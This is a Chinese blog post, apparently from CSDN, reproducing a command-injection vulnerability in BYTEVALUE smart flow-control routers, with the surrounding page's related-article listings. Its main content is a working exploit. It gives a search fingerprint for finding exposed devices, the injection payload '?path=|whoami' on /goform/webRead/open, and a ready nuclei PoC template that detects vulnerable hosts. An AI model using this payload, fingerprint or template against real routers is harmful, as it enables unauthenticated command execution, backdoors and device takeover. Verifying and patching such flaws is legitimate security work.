【漏洞复现】BYTEVALUE智能流控路由器存在命令执行

最新推荐文章于 2024-08-05 21:05:25 发布
最新推荐文章于 2024-08-05 21:05:25 发布
阅读量1.2k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/134328873
版权

【漏洞介绍】

百为智能流控路由器 /goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,写入后门,获取服务器权限,从而获取路由器权限。

【指纹】

title=”BYTEVALUE 智能流控路由器”

【UI】

【payload】

/goform/webRead/open/?path=|whoami

【Poc】

id: BYTEVALUE-Rce
info:
  name: BYTEVALUE-Rce
  author: BYTEVALUE-Rce
  severity: critical
  tags: BYTEVALUE

http:
  - raw:
    - |
        GET /goform/webRead/open/?path=|whoami HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "admin"
      - type: status
        status:
          - 200

【使用nuclei复现】

渗透测试老鸟-九青
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
iKuai 流控路由 SQL注入漏洞(含批量验证poc)
weixin_43567873的博客
04-06 330
iKuai 流控路由 SQL注入漏洞(含批量验证poc)
百为智能流控路由器 RCE漏洞复现
0xSec
12-04 868
百为智能流控路由器 /goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞,未经身份认证的攻击者可以利用此漏洞执行任意指令,获取服务器权限。
BYTEVALUE 百为流控路由器远程命令漏洞(含批量验证poc)(1)
2401_83946509的博客
04-15 689
BYTEVALUE百为流控路由拥有强大的多线分流,多线叠加负载均衡功能,加上领先的智能流控QOS技术能解决网吧,小区等公共营业场所带宽不够的难题。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
百为智能流控路由器__命令执行漏洞复现
m0_64366018的博客
01-25 496
直接访问URL就可以可以回显了,如果没有回显或者302跳转了说明漏洞存在
BYTEVALUE 百为流控路由器远程命令漏洞(含批量验证poc)
weixin_43567873的博客
04-03 79
BYTEVALUE 百为流控路由器远程命令漏洞(含批量验证poc)
Android执行shell命令详解
09-05
在Android系统中,有时我们需要执行一些底层操作,这时就用到了shell命令。本文将深入解析如何在Android应用中执行shell命令以及它们的一些常见用途。 **一、执行Shell命令的方法** 在Android应用中执行shell命令...
4bytes:常见智能合约功能的4byte标识符列表
02-05
4bytes:常见智能合约功能的4byte标识符列表
VC++实现CMD命令执行与获得返回信息
09-09
在VC++编程环境中,开发人员经常需要执行操作系统级别的命令,如磁盘操作、网络通信或者系统管理等。这些任务可以通过调用Windows API中的`CreateProcess`函数来实现,该函数可以启动新的进程并控制它的执行。本文将...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8374
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
“微软蓝屏”事件暴露了网络安全哪些问题?
2302_80152430的博客
08-03 503
例如,电力系统的故障会波及到依赖电力的通信网络和制造业,而医疗设备的故障则直接影响到患者的健康和生命安全。因此,技术领域需要不断完善系统的韧性,加强风险管理和质量控制机制,确保系统的稳定性和安全性。随着信息技术的普及,公众对网络和服务中断的容忍度越来越低,这就要求各行各业不仅要保障自身系统的稳定运行,还要加强与客户的沟通和透明度。4. 自动化测试与持续集成:使用自动化测试工具,定期运行测试用例,提高测试效率和覆盖率,同时实施持续集成策略,确保每次代码变更都经过自动化的构建和测试。
网络安全】本地文件包含及远程文件包含漏洞详解
goldfish8848的博客
08-05 882
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 1039
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
C++在网络安全领域的应用
2302_79331124的博客
08-04 1083
总的来说,C++在网络安全领域的应用广泛且深入。其高性能、灵活性和对底层硬件的控制使其成为开发各种安全解决方案的理想选择。随着网络安全威胁的不断演变,C++将继续在保护数字世界的过程中发挥重要作用。如果你对网络安全感兴趣,学习和掌握C++无疑将为你的技术发展方面提供强大的助力。
等保测评与网络安全应急响应机制建设:构建坚实的安全防线
A526847的博客
08-05 385
等保测评与网络安全应急响应机制建设是企业网络安全防护的两大支柱。企业应高度重视这两项工作,将其纳入日常管理中,形成常态化的风险管理机制。只有这样,才能确保在数字化时代中稳健前行,为业务的持续发展和创新提供有力保障。
蓝屏事件:网络安全的启示
m0_67187271的博客
08-04 1393
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。该事件突显了在快速迭代的软件更新周期中,充分的测试和评估的重要性。通过强化日志管理、质量管理、风险评估以及灾难恢复计划,结合冗余系统设计和自动化监控工具的应用,我们能够显著提高对类似大规模故障的预防能力和应对速度,为确保系统的稳定性和可靠性奠定坚实的基础。
自学黑客(网络安全
最新发布
2301_77160226的博客
08-05 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
byte value
02-15
byte 值是计算机中存储数据的单位,一个 byte 可以存储一个字符或者八位二进制数字。它是计算机存储容量的基本单位,是其他存储单位(如 kilobyte、megabyte、gigabyte)的基础。在计算机中,一个 byte 可以存储从 0 到 255 之间的整数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值